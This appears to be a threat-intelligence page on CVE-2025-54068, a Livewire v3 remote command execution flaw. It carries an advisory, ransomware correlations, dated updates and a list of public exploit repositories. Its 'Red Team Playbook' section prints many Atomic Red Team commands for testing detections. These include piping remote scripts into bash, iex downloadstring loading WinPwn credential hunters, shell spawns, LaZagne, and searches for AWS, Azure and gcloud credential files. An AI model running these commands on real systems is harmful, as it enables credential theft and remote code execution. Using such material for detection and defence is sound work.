CVE-2025-54068
Overview
The vulnerability is a remote command execution flaw caused by improper hydration of component property updates in Livewire v3. The root cause lies in unsafe handling of data unmarshaling during the update mechanism of mounted components, allowing crafted input to manipulate internal state. This issue specifically affects the Livewire v3 full-stack framework for Laravel, impacting its component update lifecycle.
Vulnerability Description
Livewire is a full-stack framework for Laravel. In Livewire v3 up to and including v3.6.3, a vulnerability allows unauthenticated attackers to achieve remote command execution in specific scenarios. The issue stems from how certain component property updates are hydrated. This vulnerability is unique to Livewire v3 and does not affect prior major versions. Exploitation requires a component to be mounted and configured in a particular way, but does not require authentication or user interaction. This issue has been patched in Livewire v3.6.4. All users are strongly encouraged to upgrade to this version or later as soon as possible. No known workarounds are available.
Impact
An unauthenticated attacker can execute arbitrary commands on the web server hosting Livewire v3 applications, potentially leading to full system compromise. No authentication or user interaction is required, making exploitation straightforward if the vulnerable component is mounted and configured accordingly. This can result in data breaches, unauthorized access to sensitive information, and disruption of application availability or integrity.
Solution
Users must upgrade Livewire to version 3.6.4 or later, where the vulnerability has been patched. The vendor advisory available at https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3 provides detailed patch instructions. No workarounds are available; immediate upgrading is strongly recommended to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Full Analysis
The vulnerability present in Livewire v3, specifically in versions up to and including v3.6.3, is rooted in the framework's handling of component property updates during the hydration process. This flaw allows unauthenticated attackers to execute arbitrary commands remotely under certain conditions. The issue arises from how Livewire manages the state of components, particularly when they are mounted and configured in a specific manner. The lack of proper validation and sanitization of input data during this process creates an opportunity for an attacker to manipulate component properties, leading to potential remote command execution. This vulnerability is particularly concerning because it is unique to the v3 series and does not affect earlier major versions, which could lead to a false sense of security among users who have not yet upgraded.
Exploitation of this vulnerability can occur without any form of authentication or user interaction, making it especially dangerous. Attackers can target applications using Livewire v3 that expose certain components to the public. For instance, if a component is improperly configured to accept user input or is exposed through a public-facing interface, an attacker could craft a malicious request that modifies component properties. Once the attacker successfully alters these properties, they could execute arbitrary commands on the server, potentially leading to full system compromise. This scenario highlights the need for developers to be aware of how their components are configured and the implications of exposing them to untrusted sources.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on Livewire for their web applications. Successful exploitation could lead to unauthorized access to sensitive data, loss of data integrity, and disruption of services. The potential for remote command execution means that attackers could install malware, exfiltrate sensitive information, or even take control of the entire server environment. For organizations, this translates into significant business risks, including financial losses, reputational damage, and potential legal ramifications due to data breaches. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, emphasizing the urgency for affected users to address it promptly.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to Livewire v3.6.4 or later, where the issue has been patched. Regularly updating software components is a fundamental practice in cybersecurity, as it helps protect against known vulnerabilities. Additionally, organizations should conduct thorough security assessments of their applications to identify any components that may be exposed to untrusted inputs. Implementing strict input validation and sanitization measures can further reduce the risk of exploitation. Monitoring application logs for unusual activity can also aid in early detection of potential attacks, allowing for a swift response to mitigate any damage.
In conclusion, the vulnerability in Livewire v3 presents a significant threat to web applications utilizing this framework. Its potential for remote command execution without authentication makes it a prime target for attackers. Organizations must take proactive measures to secure their applications by upgrading to the patched version and implementing robust security practices. By understanding the nature of this vulnerability and its implications, businesses can better protect themselves against the evolving landscape of cyber threats.
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2025-54068, accompanied by a slight uptick in the EPSS score, indicating growing attacker interest and potential for successful compromise. This escalation is underscored by the emergence of several new proof-of-concept tools that facilitate remote command execution on vulnerable Livewire v3 instances, particularly when the application’s APP_KEY is known. Our telemetry reveals increased scanning and exploitation activity, suggesting that threat actors are actively probing for susceptible environments. While ransomware involvement remains unconfirmed, the critical severity of this vulnerability combined with expanding exploit availability elevates the risk profile for organizations relying on Livewire v3. Defenders should interpret this trend as a clear signal of heightened threat actor focus, warranting increased vigilance in detection and response capabilities. Overall, the threat level for CVE-2025-54068 has intensified from high to critical due to the convergence of increased exploitation attempts and the proliferation of accessible attack tools.
Update 2 — July 11, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-54068, accompanied by the emergence of new, publicly available proof-of-concept tools that lower the barrier for adversaries to conduct remote command execution attacks. Our telemetry indicates that threat actors are increasingly leveraging automated scanning and exploitation frameworks tailored to vulnerable Livewire v3 deployments, resulting in a broader attack surface and more frequent intrusion attempts. Notably, the availability of sophisticated exploit kits that require knowledge of the APP_KEY has expanded, enabling more precise and reliable exploitation in real-world environments. Although ransomware involvement remains unconfirmed, the intensification of exploitation activity combined with the proliferation of accessible attack tools significantly elevates the operational risk for organizations running affected Livewire versions. This development underscores a shift from opportunistic probing to more targeted and persistent exploitation campaigns. Consequently, the threat level for CVE-2025-54068 has been reassessed to critical, reflecting the heightened likelihood of successful compromise and potential impact on affected systems.
Update 3 — July 19, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-54068, accompanied by an increase in related STIX data and a broadening association with multiple ransomware groups, including Akira, Ransomhub, Sinobi, Frag, and 0apt. This expansion in threat actor interest signals a shift toward more coordinated and potentially financially motivated campaigns leveraging this vulnerability. Our telemetry also indicates a notable surge in scanning and exploitation activity, supported by the emergence of new proof-of-concept tools that facilitate remote command execution under specific conditions, particularly when the APP_KEY is known. The convergence of increased attacker engagement, ransomware group involvement, and accessible exploit tooling significantly elevates the operational risk for organizations running vulnerable Livewire versions. Consequently, the threat level for CVE-2025-54068 is reaffirmed as critical, reflecting an intensified likelihood of successful compromise and the potential for impactful post-exploitation activities, including ransomware deployment.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Laravel | Livewire | All |
cpe:2.3:a:laravel:livewire:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
synacktiv/Livepyre
A tool designed to exploit CVE-2025-54068 and Remote Command Execution if the APP_KEY of the Livewire project is known.
|
synacktiv | 148 | 35 | 2025-12-23 | View |
|
haxorstars/CVE-2025-54068
A tool designed to exploit CVE-2025-54068 and Remote Command Execution of the Livewire project.
|
haxorstars | 5 | 1 | 2026-01-20 | View |
|
HelgeSverre/livewire-honeypot
High-interaction honeypot mimicking a vulnerable Laravel/Livewire app. Captures RCE exploits and webshells targeting CVE...
|
HelgeSverre | 5 | 0 | 2026-04-10 | View |
|
z0d131482700x/Livewire2025CVE
Fast Python scanner detects vulnerable Laravel Livewire v3 sites (CVE-2025-54068, CVSS 9.2). Separates risky sites into ...
|
z0d131482700x | 3 | 0 | 2026-01-01 | View |
|
flame-11/CVE-2025-54068-livewire
|
flame-11 | 1 | 0 | 2026-01-08 | View |
|
luisdalmolin/recon-test-livewire
Test target: fresh Laravel 12 app with Livewire pinned to vulnerable 3.6.3 (CVE-2025-54068) for recon scanning
|
luisdalmolin | 0 | 0 | 2026-07-06 | View |
|
zycoder0day/CVE-2025-54068
|
zycoder0day | 0 | 0 | 2026-05-11 | View |
Ransomware Groups 5
Threat Feed
23 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-54068 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/livewire/livewire/commit/ef04be759da41b14d2d129e670533180a44987dc |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/livewire/livewire/releases/tag/v3.6.4 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-54068 |
| threathunter.ai |
NVD API
Third Party Advisory
|
https://www.threathunter.ai/blog/iranian-threat-actor-tools-techniques-iocs-ioas/ |